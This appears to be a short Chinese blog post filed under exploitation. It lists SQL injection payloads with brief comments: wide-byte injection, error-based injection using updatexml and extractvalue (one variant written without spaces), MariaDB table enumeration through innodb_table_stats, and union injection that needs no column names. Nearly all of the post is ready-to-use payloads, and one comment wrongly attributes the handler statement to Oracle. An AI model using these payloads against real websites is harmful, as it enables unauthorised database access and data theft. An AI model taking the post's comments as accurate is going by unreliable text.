SQL注入

SQL注入

• 作者: admin
• 时间: 2021-05-27
• 分类: 漏洞利用

select user from users limit 0,1 # 取查询结果的0-1条记录

select group_concat(user) from users # 将查询结果合并输出

select distinct(user) from users # 去重

oracle下可以用handler代替select（handler words open;handler words read first）%df' # 宽字节注入

1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)%23 # 报错注入，updatexml和下面的extractvalue可以相互替换

1'^extractvalue(1,concat(0x7e,(select(database())),0x7e))%23 # 不用空格的报错注入

select group_concat(table_name) from mysql.innodb_table_stats # MariaDB查表，相当于information_schema.columns

select group_concat(b) from(select 1,2,3 as b union select * from users)x # 无列名注入

标签: none